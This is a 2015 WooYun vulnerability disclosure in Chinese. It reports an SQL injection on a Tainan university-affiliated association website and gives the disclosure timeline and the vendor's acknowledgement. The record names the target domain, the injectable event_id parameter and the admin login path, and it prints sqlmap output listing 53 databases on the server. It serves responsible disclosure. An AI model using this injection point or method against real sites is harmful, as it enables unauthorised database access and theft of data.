漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0155426
漏洞标题:台湾学校之台南市国立成功大学某分站sql注入漏洞(臺灣地區)
相关厂商:台湾国立成功大学
漏洞作者: X4car
提交时间:2015-11-24 11:36
修复时间:2016-01-11 15:32
公开时间:2016-01-11 15:32
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-11-24: 细节已通知厂商并且等待厂商处理中
2015-11-27: 厂商已经确认,细节仅向厂商公开
2015-12-07: 细节向核心白帽子及相关领域专家公开
2015-12-17: 细节向普通白帽子公开
2015-12-27: 细节向实习白帽子公开
2016-01-11: 细节向公众公开
简要描述:
目标网站为http://www.ctbaa.org/,是台南市国立成功大学企业管理协进会。存在sql注入漏洞。
详细说明:
该站注入点:http://**.**.**.**/activity/event_news_detail.php?event_id=4&topage=&qry_str=
并且,可以通过注入得到的数据登陆后台管理页面,后台管理页面地址为:
http://**.**.**.**/admin/login.php
漏洞证明:
该站注入点:http://**.**.**.**/activity/event_news_detail.phpevent_id=4&topage=&qry_str=
使用sqlmap得到数据库列表:
available databases [53]:
[*] 2014cl_db
[*] almondcoffee_db
[*] anderson_db
[*] bandd_db
[*] best2
[*] bhc_db
[*] bioscholars_db
[*] bobo_db
[*] carch_land_db
[*] chuener_fong_db
[*] ctbaa_db
[*] ctbaa_party_db
[*] cwin_db
[*] cyia_db
[*] db_amigosoft
[*] db_amigosoft_cn
[*] db_haoyi
[*] db_iss
[*] db_Travel
[*] db_vacation
[*] db_yiweiintl
[*] etanlife2010_db
[*] geneferm_db
[*] gromax_chair_db
[*] gsg_db
[*] handpro_db
[*] handpro_en_db
[*] hytorc_db
[*] information_schema
[*] kindred_spirit_db
[*] kindred_spirit_en
[*] madou_resthome
[*] motou_db
[*] mysql
[*] newstar_db
[*] obami_db
[*] oyster_db
[*] palyultn_db
[*] pin_family_db
[*] prodar_db
[*] rha_db
[*] sby_engine_db
[*] shang_lian_db
[*] sounyu_db
[*] taiwan11_db
[*] test
[*] tnar_db
[*] tsic_db
[*] vancota_db
[*] yenchao_db
[*] ys-tnn_db
[*] ysg_db
[*] yuyuen_db
这样就可验证存在sql注入漏洞
后台管理页面登陆不做尝试
修复方案:
安装安全软件或者过滤。
版权声明:转载请注明来源 X4car@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:17
确认时间:2015-11-27 01:47
厂商回复:
感謝通報
最新状态:
暂无